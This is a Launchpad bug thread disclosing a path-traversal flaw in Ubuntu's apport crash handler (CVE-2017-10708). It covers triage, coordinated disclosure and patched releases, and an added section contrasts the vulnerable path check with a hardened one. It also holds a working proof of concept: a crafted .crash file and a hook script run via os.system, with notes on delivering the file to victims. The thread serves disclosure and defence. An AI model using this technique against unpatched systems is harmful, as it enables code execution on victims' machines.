Code execution through path traversal in .crash files processing

Bug #1700573 reported by Felix Wilhelm on 2017-06-26
Affects            Status   Importance   Assigned to    Milestone
Apport                      High         Unassigned
apport (Ubuntu)             High         Brian Murray
  Trusty                    High         Unassigned
  Xenial                    High         Unassigned
  Yakkety                   High         Unassigned
  Zesty                     High         Unassigned
  Artful                    High         Brian Murray

Bug Description

The function add_hooks_info in apport/report.py is vulnerable to a directory traversal when processing the ExecutablePath key of a malicious .crash file:

        opt_path = None
        if self.get('ExecutablePath', '').startswith(_opt_dir):
            opt_path = self.get('ExecutablePath', '')
        elif package:
            # check package contents
            try:
                for f in apport.packaging.get_files(package):
                    if f.startswith(_opt_dir) and os.path.isfile(f):
                        opt_path = f
                        break
            except ValueError:
                # uninstalled package
                pass

        if opt_path:
            while len(opt_path) >= len(_opt_dir):
                hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 'package-hooks'))
                opt_path = os.path.dirname(opt_path)

This can be used to execute an arbitrary python script from an attacker controlled path when a crash file is opened:

fwilhelm@box:~$ cat poc.crash
ProblemType: Bug
ExecutablePath: /opt/../tmp/poc/share/apport/package-hooks
Package: f

fwilhelm@box:~$ cat /tmp/poc/share/apport/package-hooks/f.py
import os
os.system("gnome-calculator")

fwilhelm@bpx:~$ strace -eprocess -f /usr/share/apport/apport-gtk poc.crash 2>&1 | grep gnome-calculator
[pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-calculator"], [/* 65 vars */]) = 0
[pid 62617] execve("/usr/bin/gnome-calculator", ["gnome-calculator"], [/* 64 vars */]) = 0

The subdirectory requirement makes this a bit tricky to exploit remotely, but depending on the environment a malicious USB drive, a shared NFS share or a crash file inside an archive could be used.

Please credit Felix Wilhelm from the Google Security Team in all releases, patches and advisories related to these issues.
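The startswith() test in the snippet above accepts any string that merely begins with _opt_dir, including one that immediately walks back out with "..", and the dirname() loop then turns every ancestor of that string into a candidate hook directory. The following added example (written for this page; it is neither apport's code nor the patch Brian attached, which is not reproduced here) puts the prefix-only walk next to a canonicalising version that resolves the path with os.path.realpath and accepts it only if the resolved path stays under the /opt root. The constant _OPT_DIR = '/opt' and the sample ExecutablePath values are assumptions constructed for the demonstration.

```python
import os

# Assumed value: apport's report.py refers to _opt_dir; the PoC on this page
# implies it is '/opt'. Treated here as an assumption for the demonstration.
_OPT_DIR = '/opt'

# Constructed sample ExecutablePath values. Only the 'traversal' entry mirrors
# the PoC in the bug description; the others are made up for contrast.
SAMPLE_PATHS = {
    'legit': '/opt/vendor/app/bin/app',
    'traversal': '/opt/../tmp/poc/share/apport/package-hooks',
    'prefix_confusion': '/optional/bin/tool',
}


def hook_dirs_prefix_only(executable_path, opt_dir=_OPT_DIR):
    """Reproduce the walk from the vulnerable snippet: a bare string-prefix
    test, then one candidate hook directory per ancestor of the raw string."""
    hook_dirs = []
    if executable_path.startswith(opt_dir):
        opt_path = executable_path
        while len(opt_path) >= len(opt_dir):
            hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 'package-hooks'))
            opt_path = os.path.dirname(opt_path)
    return hook_dirs


def is_within(path, root):
    """True only when the canonical form of `path` equals `root` or lies
    below it. realpath() collapses '..' and follows symlinks, so
    '/opt/../tmp/x' resolves to '/tmp/x' and is rejected; '/optional/...'
    is rejected because commonpath compares path components, not characters."""
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(path)
    try:
        return os.path.commonpath([real_root, real_path]) == real_root
    except ValueError:
        # commonpath refuses to mix absolute and relative paths (or drives);
        # both inputs are absolute after realpath, so this is defensive only.
        return False


def hook_dirs_hardened(executable_path, opt_dir=_OPT_DIR):
    """Same ancestor walk, but only after the canonical path has been proven
    to sit under opt_dir, and the walk stops at the canonical root instead of
    relying on string length."""
    hook_dirs = []
    if not is_within(executable_path, opt_dir):
        return hook_dirs
    root = os.path.realpath(opt_dir)
    opt_path = os.path.realpath(executable_path)
    while True:
        hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 'package-hooks'))
        if opt_path == root:
            break  # containment was verified, so dirname() always reaches root
        opt_path = os.path.dirname(opt_path)
    return hook_dirs


if __name__ == '__main__':
    for label, path in SAMPLE_PATHS.items():
        print(f'{label}: {path}')
        print('  prefix-only ->', hook_dirs_prefix_only(path))
        print('  hardened    ->', hook_dirs_hardened(path))
```

Run stand-alone, the prefix-only walk lists /opt/../tmp/poc/share/apport/package-hooks among its candidates for the PoC path (the directory the description's f.py lives in) and also accepts /optional/bin/tool, while the hardened walk returns nothing for either and a normal /opt path yields one hook directory per ancestor down to /opt. Because realpath() also follows symlinks, a legitimate /opt entry that is a symlink to somewhere outside /opt is rejected too; that is the conservative side to err on for a path read from an untrusted file.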

Changed in apport (Ubuntu Trusty):
status: New → Confirmed
Changed in apport (Ubuntu Xenial):
status: New → Confirmed
Changed in apport (Ubuntu Yakkety):
status: New → Confirmed
Changed in apport (Ubuntu Zesty):
status: New → Confirmed
Changed in apport (Ubuntu Artful):
status: New → Confirmed
Changed in apport (Ubuntu Trusty):
importance: Undecided → High
Changed in apport (Ubuntu Xenial):
importance: Undecided → High
Changed in apport (Ubuntu Yakkety):
importance: Undecided → High
Changed in apport (Ubuntu Zesty):
importance: Undecided → High
Changed in apport (Ubuntu Artful):
importance: Undecided → High
Tyler Hicks (tyhicks) wrote :

Hi Felix - thanks for the report! I don't immediately see how an attacker could have control of what Apport uses for ExecutablePath in the crash file. Is there more to your attack than hand crafting a .crash file and running apport-gtk on it or am I missing something here?

Subscribing bdmurray for Ubuntu apport expertise.

Tyler Hicks (tyhicks) wrote :

I had some more time to look into this. /var/crash/ is world-writable so I used the f.crash file from this bug description and moved it into that directory. Just as this bug description suggests, gnome-calculator is launched once the crash file is processed.

If the crash file is owned by my user, the gnome-calculator process runs as my user. If the crash file is owned by root, the gnome-calculator process runs as root after I authenticate as an administrative user. I still don't see a way to escalate privileges with this bug.

If the impact of this bug is that a user can craft a crash file that causes code to be run as that user, I don't feel like this is a security issue. Do you agree, Felix?

Changed in apport:
status: New → Incomplete
Changed in apport (Ubuntu Trusty):
status: Confirmed → New
Changed in apport (Ubuntu Xenial):
status: Confirmed → New
Changed in apport (Ubuntu Yakkety):
status: Confirmed → New
Changed in apport (Ubuntu Zesty):
status: Confirmed → New
Changed in apport (Ubuntu Artful):
status: Confirmed → New
Felix Wilhelm (fwilhelm01) wrote :

Hi Tyler,

thanks for looking into this. However, I disagree with your conclusion.

The attack scenario would be that an attacker tricks a victim into opening a malicious crash file. On my Ubuntu system apport is the default handler for files ending in ".crash" so a simple click on a malicious email attachment is sufficient. Processing crash files should not lead to malicious code being executed in the same way processing a PDF or JPEG file should not lead to malicious code execution.

I think you actually fixed a very similar bug a couple of months ago and also assigned a CVE to it:
https://bugs.launchpad.net/apport/+bug/1648806

Tyler Hicks (tyhicks) wrote :

You're right, Felix. I didn't recall bug 1648806 and didn't realize that apport registered itself as a handler for .crash files. I've requested a CVE from MITRE.

@bdmurray can you prepare a fix for this bug and attach a patch? Please don't commit the fix to the public bzr tree or publicly leak any other info about this issue. Also, do you think it is necessary for Apport to register itself as a handler for .crash files? It seems to me like it provides little usefulness despite exposing users to several attacks such as this one.

Tyler Hicks (tyhicks) wrote :

This is CVE-2017-10708

Changed in apport:
status: Incomplete → Confirmed
Changed in apport (Ubuntu Trusty):
status: New → Confirmed
Changed in apport (Ubuntu Xenial):
status: New → Confirmed
Changed in apport (Ubuntu Yakkety):
status: New → Confirmed
Changed in apport (Ubuntu Zesty):
status: New → Confirmed
Changed in apport (Ubuntu Artful):
status: New → Confirmed
Brian Murray (brian-murray) wrote :

I'm on holiday next week but I am attaching a patch which I believe addresses the issue of path traversal in the _opt_dir for finding package hooks if somebody wants to run with it. Otherwise I'll finish this up the week of the 10th and add tests for it too.

Tyler Hicks (tyhicks) wrote :

Thanks for the patch, Brian. I believe that it should fix the issue reported here but would prefer to wait for you to finalize the patch before we prepare security updates. More importantly, before preparing security updates, I'd like to know if it is possible for us to remove apport as the registered .crash file handler. While the patch that you attached plugs another hole in the ship's hull, it'd be nice to plug them all at once.

Brian Murray (brian-murray) wrote :

Attached is the same patch which addresses path traversal in the ExecutablePath field of an apport report. I've also added a test for that vulnerability.

Brian Murray (brian-murray) wrote :

apport is registered as the file handler for .crash files so that one can copy a .crash file from a system which cannot submit the crash to one which can. However, I don't think that use case is used very frequently and it is just as easy to manually submit the crash by using apport-cli so let's remove the file handler.

I tested the attached patch by rebuilding apport and installing it on an Artful system, this was enough to make .crash files open with a text editor instead of apport-gtk.

Tyler Hicks (tyhicks) wrote :

Felix, now that we've got upstream fixes, I'd like to set a coordinated release date to make this issue public and provide Ubuntu security updates. We still need to prepare and test updates on the distro side of things so I'd like to propose 2017-07-18 18:00 UTC. We'll publish Ubuntu security updates, publish an Ubuntu Security Notice, and make this bug public at that time unless we hear any objections from you. Thanks!

Felix Wilhelm (fwilhelm01) wrote :

Hi Tyler,

no objections from my side. Thanks for coordinating this.

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.4-0ubuntu4.5

---------------
apport (2.20.4-0ubuntu4.5) zesty-security; urgency=medium

  * SECURITY UPDATE: code execution through path traversal in
    .crash files (LP: #1700573)
    - apport/report.py, test/test_ui.py: fix traversal issue
      and add a test for that.
    - debian/apport.install, setup.py, xdg-mime/apport.xml: removes
      apport as a file handler for .crash files. Thanks to Brian
      Murray for the patch and Felix Wilhelm for discovering this.
    - CVE-2017-10708

 -- <email address hidden> (Leonidas S. Barbosa) Mon, 17 Jul 2017 08:43:27 -0300

Changed in apport (Ubuntu Zesty):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.3-0ubuntu8.7

---------------
apport (2.20.3-0ubuntu8.7) yakkety-security; urgency=medium

  * SECURITY UPDATE: code execution through path traversal in
    .crash files (LP: #1700573)
    - apport/report.py, test/test_ui.py: fix traversal issue
      and add a test for that.
    - debian/apport.install, setup.py, xdg-mime/apport.xml: removes
      apport as a file handler for .crash files. Thanks to Brian
      Murray for the patch and Felix Wilhelm for discovering this.
    - CVE-2017-10708

 -- <email address hidden> (Leonidas S. Barbosa) Mon, 17 Jul 2017 08:43:41 -0300

Changed in apport (Ubuntu Yakkety):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.14.1-0ubuntu3.25

---------------
apport (2.14.1-0ubuntu3.25) trusty-security; urgency=medium

  * SECURITY UPDATE: code execution through path traversal in
    .crash files (LP: #1700573)
    - apport/report.py, test/test_ui.py: fix traversal issue
      and add a test for that.
    - debian/apport.install, setup.py, xdg-mime/apport.xml: removes
      apport as a file handler for .crash files. Thanks to Brian
      Murray for the patch and Felix Wilhelm for discovering this.
    - CVE-2017-10708

 -- <email address hidden> (Leonidas S. Barbosa) Mon, 17 Jul 2017 08:43:04 -0300

Changed in apport (Ubuntu Trusty):
status: Confirmed → Fix Released
Changed in apport:
status: Confirmed → Fix Released
importance: Undecided → High
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.1-0ubuntu2.10

---------------
apport (2.20.1-0ubuntu2.10) xenial-security; urgency=medium

  * SECURITY UPDATE: code execution through path traversal in
    .crash files (LP: #1700573)
    - apport/report.py, test/test_ui.py: fix traversal issue
      and add a test for that.
    - debian/apport.install, setup.py, xdg-mime/apport.xml: removes
      apport as a file handler for .crash files. Thanks to Brian
      Murray for the patch and Felix Wilhelm for discovering this.
    - CVE-2017-10708

 -- <email address hidden> (Leonidas S. Barbosa) Mon, 17 Jul 2017 08:43:18 -0300

Changed in apport (Ubuntu Xenial):
status: Confirmed → Fix Released
information type: Private Security → Public Security
tags: added: patch
Changed in apport (Ubuntu Artful):
status: Confirmed → In Progress
assignee: nobody → Brian Murray (brian-murray)
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.6-0ubuntu4

---------------
apport (2.20.6-0ubuntu4) artful; urgency=medium

  * apport/REThread.py: A bare except needs to be used so that we can catch
    the dialog being closed.
  * test/test_report.py: Be a little patient and give some time for the core
    file to show up.

 -- Brian Murray <email address hidden> Fri, 21 Jul 2017 10:42:33 -0700

Changed in apport (Ubuntu Artful):
status: In Progress → Fix Released